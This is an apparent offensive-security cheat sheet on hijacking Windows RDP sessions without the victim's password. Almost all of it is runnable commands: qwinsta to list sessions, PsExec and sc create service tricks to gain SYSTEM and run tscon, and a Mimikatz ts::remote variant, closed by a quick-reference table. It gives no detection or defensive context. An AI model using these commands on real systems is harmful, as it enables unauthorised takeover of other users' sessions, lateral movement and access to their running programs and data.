Skip to main content

Overview

As SYSTEM, hijack active or disconnected RDP sessions without knowing the user’s password. Uses tscon to switch sessions.

List Sessions

query user
qwinsta
Output shows session IDs and state (Active/Disc).

Hijack — From SYSTEM

Get SYSTEM First

PsExec.exe -s cmd.exe
Or via service:
sc create sesshijack binpath= "cmd.exe /k tscon TARGET_SESSION_ID /dest:rdp-tcp#CURRENT_SESSION"
sc start sesshijack

Switch Session

tscon TARGET_SESSION_ID /dest:rdp-tcp#YOUR_SESSION_ID

Example

# You are in session 2, want to hijack session 1
tscon 1 /dest:rdp-tcp#2

Via Service (No Interactive SYSTEM)

sc create hijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#2"
net start hijack

Mimikatz Method

mimikatz # ts::sessions          # List sessions
mimikatz # token::elevate        # Get SYSTEM
mimikatz # ts::remote /id:1      # Hijack session 1

Notes

  • Requires SYSTEM privileges
  • Works on disconnected sessions too
  • No password needed for target session
  • The original user is disconnected — tscon reattaches their session to the attacker’s terminal, dropping their live connection (Event ID 4779). Their running programs persist, but they lose the active session.
  • Server 2019+ may require additional steps

Quick Reference

TaskCommand
List sessionsquery user or qwinsta
Hijacktscon SESSION_ID /dest:rdp-tcp#YOUR_SESSION
Via servicesc create hijack binpath= "cmd /k tscon ..."
Mimikatzts::remote /id:SESSION_ID